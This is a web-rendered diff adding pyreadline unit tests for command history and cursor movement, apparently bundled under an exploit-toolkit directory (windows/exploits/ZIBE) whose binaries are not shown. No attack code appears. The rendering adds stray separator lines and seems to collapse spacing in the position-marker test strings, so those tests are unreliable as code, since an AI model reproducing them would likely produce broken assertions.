@ -0,0 +1,148 @@
|
|||
# -*- coding: UTF-8 -*-
|
||||
# Copyright (C) 2007 Jörgen Stenarson. <>
|
||||
|
||||
import sys, unittest
|
||||
sys.path.append (u'../..')
|
||||
#from pyreadline.modes.vi import *
|
||||
#from pyreadline import keysyms
|
||||
from pyreadline.lineeditor import lineobj
|
||||
from pyreadline.lineeditor.history import LineHistory
|
||||
import pyreadline.lineeditor.history as history
|
||||
|
||||
import pyreadline.logger
|
||||
pyreadline.logger.sock_silent=False
|
||||
from pyreadline.logger import log
|
||||
#----------------------------------------------------------------------
|
||||
|
||||
|
||||
#----------------------------------------------------------------------
|
||||
RL=lineobj.ReadLineTextBuffer
|
||||
|
||||
class Test_prev_next_history(unittest.TestCase):
|
||||
t = u"test text"
|
||||
|
||||
def setUp(self):
|
||||
self.q = q = LineHistory()
|
||||
for x in [u"aaaa", u"aaba", u"aaca", u"akca", u"bbb", u"ako"]:
|
||||
q.add_history(RL(x))
|
||||
|
||||
def test_previous_history (self):
|
||||
hist = self.q
|
||||
assert hist.history_cursor == 6
|
||||
l = RL(u"")
|
||||
hist.previous_history(l)
|
||||
assert l.get_line_text() == u"ako"
|
||||
hist.previous_history(l)
|
||||
assert l.get_line_text() == u"bbb"
|
||||
hist.previous_history(l)
|
||||
assert l.get_line_text() == u"akca"
|
||||
hist.previous_history(l)
|
||||
assert l.get_line_text() == u"aaca"
|
||||
hist.previous_history(l)
|
||||
assert l.get_line_text() == u"aaba"
|
||||
hist.previous_history(l)
|
||||
assert l.get_line_text() == u"aaaa"
|
||||
hist.previous_history(l)
|
||||
assert l.get_line_text() == u"aaaa"
|
||||
|
||||
def test_next_history (self):
|
||||
hist=self.q
|
||||
hist.beginning_of_history()
|
||||
assert hist.history_cursor==0
|
||||
l=RL(u"")
|
||||
hist.next_history(l)
|
||||
assert l.get_line_text()==u"aaba"
|
||||
hist.next_history(l)
|
||||
assert l.get_line_text()==u"aaca"
|
||||
hist.next_history(l)
|
||||
assert l.get_line_text()==u"akca"
|
||||
hist.next_history(l)
|
||||
assert l.get_line_text()==u"bbb"
|
||||
hist.next_history(l)
|
||||
assert l.get_line_text()==u"ako"
|
||||
hist.next_history(l)
|
||||
assert l.get_line_text()==u"ako"
|
||||
|
||||
class Test_prev_next_history(unittest.TestCase):
|
||||
t = u"test text"
|
||||
|
||||
def setUp(self):
|
||||
self.q = q = LineHistory()
|
||||
for x in [u"aaaa",u"aaba",u"aaca",u"akca",u"bbb",u"ako"]:
|
||||
q.add_history(RL(x))
|
||||
|
||||
def test_history_search_backward (self):
|
||||
q = LineHistory()
|
||||
for x in [u"aaaa",u"aaba",u"aaca",u" aacax",u"akca",u"bbb",u"ako"]:
|
||||
q.add_history(RL(x))
|
||||
a=RL(u"aa",point=2)
|
||||
for x in [u"aaca",u"aaba",u"aaaa",u"aaaa"]:
|
||||
res=q.history_search_backward(a)
|
||||
assert res.get_line_text()==x
|
||||
|
||||
def test_history_search_forward (self):
|
||||
q = LineHistory()
|
||||
for x in [u"aaaa",u"aaba",u"aaca",u" aacax",u"akca",u"bbb",u"ako"]:
|
||||
q.add_history(RL(x))
|
||||
q.beginning_of_history()
|
||||
a=RL(u"aa",point=2)
|
||||
for x in [u"aaba",u"aaca",u"aaca"]:
|
||||
res=q.history_search_forward(a)
|
||||
assert res.get_line_text()==x
|
||||
|
||||
class Test_history_search_incr_fwd_backwd(unittest.TestCase):
|
||||
def setUp(self):
|
||||
self.q = q = LineHistory()
|
||||
for x in [u"aaaa",u"aaba",u"aaca",u"akca",u"bbb",u"ako"]:
|
||||
q.add_history(RL(x))
|
||||
|
||||
def test_backward_1(self):
|
||||
q = self.q
|
||||
self.assertEqual(q.reverse_search_history(u"b"), u"bbb")
|
||||
self.assertEqual(q.reverse_search_history(u"b"), u"aaba")
|
||||
self.assertEqual(q.reverse_search_history(u"bb"), u"aaba")
|
||||
|
||||
def test_backward_2(self):
|
||||
q = self.q
|
||||
self.assertEqual(q.reverse_search_history(u"a"), u"ako")
|
||||
self.assertEqual(q.reverse_search_history(u"aa"), u"aaca")
|
||||
self.assertEqual(q.reverse_search_history(u"a"), u"aaca")
|
||||
self.assertEqual(q.reverse_search_history(u"ab"), u"aaba")
|
||||
|
||||
|
||||
def test_forward_1(self):
|
||||
q = self.q
|
||||
self.assertEqual(q.forward_search_history(u"a"), u"ako")
|
||||
|
||||
def test_forward_2(self):
|
||||
q = self.q
|
||||
q.history_cursor = 0
|
||||
self.assertEqual(q.forward_search_history(u"a"), u"aaaa")
|
||||
self.assertEqual(q.forward_search_history(u"a"), u"aaba")
|
||||
self.assertEqual(q.forward_search_history(u"ak"), u"akca")
|
||||
self.assertEqual(q.forward_search_history(u"akl"), u"akca")
|
||||
self.assertEqual(q.forward_search_history(u"ak"), u"akca")
|
||||
self.assertEqual(q.forward_search_history(u"ako"), u"ako")
|
||||
|
||||
class Test_empty_history_search_incr_fwd_backwd(unittest.TestCase):
|
||||
def setUp(self):
|
||||
self.q = q = LineHistory()
|
||||
|
||||
def test_backward_1(self):
|
||||
q = self.q
|
||||
self.assertEqual(q.reverse_search_history(u"b"), u"")
|
||||
|
||||
def test_forward_1(self):
|
||||
q = self.q
|
||||
self.assertEqual(q.forward_search_history(u"a"), u"")
|
||||
|
||||
|
||||
#----------------------------------------------------------------------
|
||||
# utility functions
|
||||
|
||||
#----------------------------------------------------------------------
|
||||
|
||||
if __name__ == u'__main__':
|
||||
unittest.main()
|
||||
|
||||
l=lineobj.ReadLineTextBuffer(u"First Second Third")
|
||||
390
windows/exploits/ZIBE/pyreadline/test/test_lineeditor.py
Normal file
390
windows/exploits/ZIBE/pyreadline/test/test_lineeditor.py
Normal file
|
|
@ -0,0 +1,390 @@
|
|||
# Copyright (C) 2006 Michael Graz. <mgraz@plan10.com>
|
||||
|
||||
import sys, unittest
|
||||
sys.path.append (u'../..')
|
||||
#from pyreadline.modes.vi import *
|
||||
#from pyreadline import keysyms
|
||||
from pyreadline.lineeditor import lineobj
|
||||
|
||||
#----------------------------------------------------------------------
|
||||
|
||||
|
||||
#----------------------------------------------------------------------
|
||||
|
||||
class Test_copy (unittest.TestCase):
|
||||
def test_copy1 (self):
|
||||
l=lineobj.ReadLineTextBuffer(u"first second")
|
||||
q=l.copy()
|
||||
self.assertEqual(q.get_line_text(),l.get_line_text())
|
||||
self.assertEqual(q.point,l.point)
|
||||
self.assertEqual(q.mark,l.mark)
|
||||
|
||||
def test_copy2 (self):
|
||||
l=lineobj.ReadLineTextBuffer(u"first second",point=5)
|
||||
q=l.copy()
|
||||
self.assertEqual(q.get_line_text(),l.get_line_text())
|
||||
self.assertEqual(q.point,l.point)
|
||||
self.assertEqual(q.mark,l.mark)
|
||||
|
||||
|
||||
class Test_linepos (unittest.TestCase):
|
||||
t="test text"
|
||||
def test_NextChar (self):
|
||||
t=self.t
|
||||
l=lineobj.ReadLineTextBuffer(t)
|
||||
for i in range(len(t)):
|
||||
self.assertEqual(i,l.point)
|
||||
l.point=lineobj.NextChar
|
||||
#advance past end of buffer
|
||||
l.point=lineobj.NextChar
|
||||
self.assertEqual(len(t),l.point)
|
||||
|
||||
def test_PrevChar (self):
|
||||
t=self.t
|
||||
l=lineobj.ReadLineTextBuffer(t,point=len(t))
|
||||
for i in range(len(t)):
|
||||
self.assertEqual(len(t)-i,l.point)
|
||||
l.point=lineobj.PrevChar
|
||||
#advance past beginning of buffer
|
||||
l.point=lineobj.PrevChar
|
||||
self.assertEqual(0,l.point)
|
||||
|
||||
def test_EndOfLine (self):
|
||||
t=self.t
|
||||
l=lineobj.ReadLineTextBuffer(t,point=len(t))
|
||||
for i in range(len(t)):
|
||||
l.point=i
|
||||
l.point=lineobj.EndOfLine
|
||||
self.assertEqual(len(t),l.point)
|
||||
|
||||
def test_StartOfLine (self):
|
||||
t=self.t
|
||||
l=lineobj.ReadLineTextBuffer(t,point=len(t))
|
||||
for i in range(len(t)):
|
||||
l.point=i
|
||||
l.point=lineobj.StartOfLine
|
||||
self.assertEqual(0,l.point)
|
||||
|
||||
|
||||
class Tests_linepos2(Test_linepos):
|
||||
t="kajkj"
|
||||
|
||||
class Tests_linepos3(Test_linepos):
|
||||
t=""
|
||||
|
||||
|
||||
class Test_movement (unittest.TestCase):
|
||||
def test_NextChar (self):
|
||||
cmd=lineobj.NextChar
|
||||
tests=[
|
||||
# u"First"
|
||||
(cmd,
|
||||
u"First",
|
||||
u"# u",
|
||||
u" # u"),
|
||||
(cmd,
|
||||
u"First",
|
||||
u" # u",
|
||||
u" #"),
|
||||
(cmd,
|
||||
u"First",
|
||||
u" #",
|
||||
u" #"),
|
||||
]
|
||||
for cmd,text,init_point,expected_point in tests:
|
||||
l=lineobj.ReadLineTextBuffer(text,get_point_pos(init_point))
|
||||
l.point=cmd
|
||||
self.assertEqual(get_point_pos(expected_point),l.point)
|
||||
|
||||
def test_PrevChar (self):
|
||||
cmd=lineobj.PrevChar
|
||||
tests=[
|
||||
# u"First"
|
||||
(cmd,
|
||||
u"First",
|
||||
u" #",
|
||||
u" # u"),
|
||||
(cmd,
|
||||
u"First",
|
||||
u" # u",
|
||||
u"# u"),
|
||||
(cmd,
|
||||
u"First",
|
||||
u"# u",
|
||||
u"# u"),
|
||||
]
|
||||
for cmd,text,init_point,expected_point in tests:
|
||||
l=lineobj.ReadLineTextBuffer(text,get_point_pos(init_point))
|
||||
l.point=cmd
|
||||
self.assertEqual(get_point_pos(expected_point),l.point)
|
||||
|
||||
|
||||
|
||||
def test_PrevWordStart (self):
|
||||
cmd=lineobj.PrevWordStart
|
||||
tests=[
|
||||
# u"First Second Third"
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
u" #",
|
||||
u" # u"),
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
u" # u",
|
||||
u" # u"),
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
u" # u",
|
||||
u"# u"),
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
u"# u",
|
||||
u"# u"),
|
||||
]
|
||||
for cmd,text,init_point,expected_point in tests:
|
||||
l=lineobj.ReadLineTextBuffer(text,get_point_pos(init_point))
|
||||
l.point=cmd
|
||||
self.assertEqual(get_point_pos(expected_point),l.point)
|
||||
|
||||
def test_NextWordStart (self):
|
||||
cmd=lineobj.NextWordStart
|
||||
tests=[
|
||||
# u"First Second Third"
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
u"# u",
|
||||
u" # u"),
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
u" # u",
|
||||
u" # u"),
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
u" # u",
|
||||
u" # u"),
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
u" # u",
|
||||
u" #"),
|
||||
]
|
||||
for cmd,text,init_point,expected_point in tests:
|
||||
l=lineobj.ReadLineTextBuffer(text,get_point_pos(init_point))
|
||||
l.point=cmd
|
||||
self.assertEqual(get_point_pos(expected_point),l.point)
|
||||
|
||||
def test_NextWordEnd (self):
|
||||
cmd=lineobj.NextWordEnd
|
||||
tests=[
|
||||
# u"First Second Third"
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
u"# u",
|
||||
u" # u"),
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
u" # u",
|
||||
u" # u"),
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
u" # u",
|
||||
u" # u"),
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
u" # u",
|
||||
u" #"),
|
||||
]
|
||||
for cmd,text,init_point,expected_point in tests:
|
||||
l=lineobj.ReadLineTextBuffer(text,get_point_pos(init_point))
|
||||
l.point=cmd
|
||||
self.assertEqual(get_point_pos(expected_point),l.point)
|
||||
|
||||
def test_PrevWordEnd (self):
|
||||
cmd=lineobj.PrevWordEnd
|
||||
tests=[
|
||||
# u"First Second Third"
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
u" #",
|
||||
u" # u"),
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
u" # u",
|
||||
u" # u"),
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
u" # u",
|
||||
u"# u"),
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
u"# u",
|
||||
u"# u"),
|
||||
]
|
||||
for cmd,text,init_point,expected_point in tests:
|
||||
l=lineobj.ReadLineTextBuffer(text,get_point_pos(init_point))
|
||||
l.point=cmd
|
||||
self.assertEqual(get_point_pos(expected_point),l.point)
|
||||
|
||||
def test_WordEnd_1 (self):
|
||||
cmd=lineobj.WordEnd
|
||||
tests=[
|
||||
# u"First Second Third"
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
u"# u",
|
||||
u" # u"),
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
u" # u",
|
||||
u" # u"),
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
u" # u",
|
||||
u" #"),
|
||||
]
|
||||
for cmd,text,init_point,expected_point in tests:
|
||||
l=lineobj.ReadLineTextBuffer(text,get_point_pos(init_point))
|
||||
l.point=cmd
|
||||
self.assertEqual(get_point_pos(expected_point),l.point)
|
||||
|
||||
def test_WordEnd_2 (self):
|
||||
cmd=lineobj.WordEnd
|
||||
tests=[
|
||||
# u"First Second Third"
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
u" # u"),
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
u" # u"),
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
u" #"),
|
||||
]
|
||||
|
||||
for cmd,text,init_point in tests:
|
||||
l=lineobj.ReadLineTextBuffer(text,get_point_pos(init_point))
|
||||
self.assertRaises(lineobj.NotAWordError,cmd,l)
|
||||
|
||||
|
||||
def test_WordStart_1 (self):
|
||||
cmd=lineobj.WordStart
|
||||
tests=[
|
||||
# u"First Second Third"
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
u"# u",
|
||||
u"# u"),
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
u" # u",
|
||||
u"# u"),
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
u" # u",
|
||||
u" # u"),
|
||||
]
|
||||
for cmd,text,init_point,expected_point in tests:
|
||||
l=lineobj.ReadLineTextBuffer(text,get_point_pos(init_point))
|
||||
l.point=cmd
|
||||
self.assertEqual(get_point_pos(expected_point),l.point)
|
||||
|
||||
def test_WordStart_2 (self):
|
||||
cmd=lineobj.WordStart
|
||||
tests=[
|
||||
# u"First Second Third"
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
u" # u"),
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
u" # u"),
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
u" #"),
|
||||
]
|
||||
|
||||
for cmd,text,init_point in tests:
|
||||
l=lineobj.ReadLineTextBuffer(text,get_point_pos(init_point))
|
||||
self.assertRaises(lineobj.NotAWordError,cmd,l)
|
||||
|
||||
|
||||
def test_StartOfLine (self):
|
||||
cmd=lineobj.StartOfLine
|
||||
tests=[
|
||||
# u"First Second Third"
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
u"# u",
|
||||
u"# u"),
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
u" # u",
|
||||
u"# u"),
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
u" #",
|
||||
u"# u"),
|
||||
]
|
||||
for cmd,text,init_point,expected_point in tests:
|
||||
l=lineobj.ReadLineTextBuffer(text,get_point_pos(init_point))
|
||||
l.point=cmd
|
||||
self.assertEqual(get_point_pos(expected_point),l.point)
|
||||
|
||||
def test_EndOfLine (self):
|
||||
cmd=lineobj.EndOfLine
|
||||
tests=[
|
||||
# u"First Second Third"
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
u"# u",
|
||||
u" #"),
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
u" # u",
|
||||
u" #"),
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
u" #",
|
||||
u" #"),
|
||||
]
|
||||
for cmd,text,init_point,expected_point in tests:
|
||||
l=lineobj.ReadLineTextBuffer(text,get_point_pos(init_point))
|
||||
l.point=cmd
|
||||
self.assertEqual(get_point_pos(expected_point),l.point)
|
||||
|
||||
def test_Point(self):
|
||||
cmd=lineobj.Point
|
||||
tests=[
|
||||
# u"First Second Third"
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
0),
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
12),
|
||||
(cmd,
|
||||
u"First Second Third",
|
||||
18),
|
||||
]
|
||||
for cmd,text,p in tests:
|
||||
l=lineobj.ReadLineTextBuffer(text,p)
|
||||
self.assertEqual(p,cmd(l))
|
||||
|
||||
|
||||
#----------------------------------------------------------------------
|
||||
# utility functions
|
||||
|
||||
def get_point_pos(pstr):
|
||||
return pstr.index(u"#")
|
||||
|
||||
def get_mark_pos(mstr):
|
||||
try:
|
||||
return mstr.index(u"#")
|
||||
except ValueError:
|
||||
return -1
|
||||
#----------------------------------------------------------------------
|
||||
|
||||
if __name__ == u'__main__':
|
||||
unittest.main()
|
||||
|
||||
l=lineobj.ReadLineTextBuffer(u"First Second Third")
|
||||
2146
windows/exploits/ZIBE/pyreadline/test/test_vi.py
Normal file
2146
windows/exploits/ZIBE/pyreadline/test/test_vi.py
Normal file
File diff suppressed because it is too large
Load diff
BIN
windows/exploits/ZIBE/pyreadline/unicode_helper.pyc
Normal file
BIN
windows/exploits/ZIBE/pyreadline/unicode_helper.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/readline.pyc
Normal file
BIN
windows/exploits/ZIBE/readline.pyc
Normal file
Binary file not shown.
BIN
windows/exploits/ZIBE/shell.pyc
Normal file
BIN
windows/exploits/ZIBE/shell.pyc
Normal file
Binary file not shown.
Some files were not shown because too many files have changed in this diff Show more
Loading…
Add table
Add a link
Reference in a new issue